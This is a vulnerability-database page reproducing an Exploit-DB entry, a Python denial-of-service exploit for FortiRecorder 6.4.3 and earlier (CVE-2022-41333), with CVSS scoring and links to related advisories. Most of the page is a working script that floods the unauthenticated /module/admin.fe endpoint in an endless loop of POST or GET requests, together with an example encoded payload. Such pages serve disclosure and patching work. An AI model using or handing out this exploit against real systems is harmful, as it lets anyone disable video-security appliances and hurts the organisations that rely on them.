Lucene search
Mohammed AdelEDB-ID:51326HistoryApr 08, 2023 - 12:00 a.m.
FortiRecorder 6.4.3 - Denial of Service
2023-04-0800:00:00
Mohammed Adel
www.exploit-db.com
124
fortirecorder
denial of service
cve-2022-41333
post
get
exploit
security advisory
fortinet
technical analysis
kali linux
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.001 Low
EPSS
Percentile
40.7%
# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5
import requests
import warnings
import sys
from urllib.parse import unquote
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
def POST(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: POST")
print("[+] Payload : " +payload)
post_url = target+"/module/admin.fe"
post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
url_decoder = unquote(payload)
full_payload = "fewReq="+url_decoder
while True:
r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
def GET(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: GET")
print("[+] Payload : " +payload)
while True:
url = target+"/module/admin.fe?fewReq="+payload
headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
r = requests.get(url, headers=headers, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi
if "post" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
POST(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
GET(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
print("[!] Invalid Request Type.")Related
prion
prion
Design/Logic Flaw
2023-03-07 17:15:00
zdt
zdt
FortiRecorder 6.4.3 - Denial of Service Exploit
2023-04-08 00:00:00
cve
cve
CVE-2022-41333
2023-03-07 17:15:12
cvelist
cvelist
CVE-2022-41333
2023-03-07 16:04:43
nvd
nvd
CVE-2022-41333
2023-03-07 17:15:12
fortinet
fortinet
FortiRecorder - DoS in login authentication mechanism
2023-03-07 00:00:00
packetstorm
packetstorm
FortiRecorder 6.4.3 Denial Of Service
2023-04-10 00:00:00
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.001 Low
EPSS
Percentile
40.7%
Related for EDB-ID:51326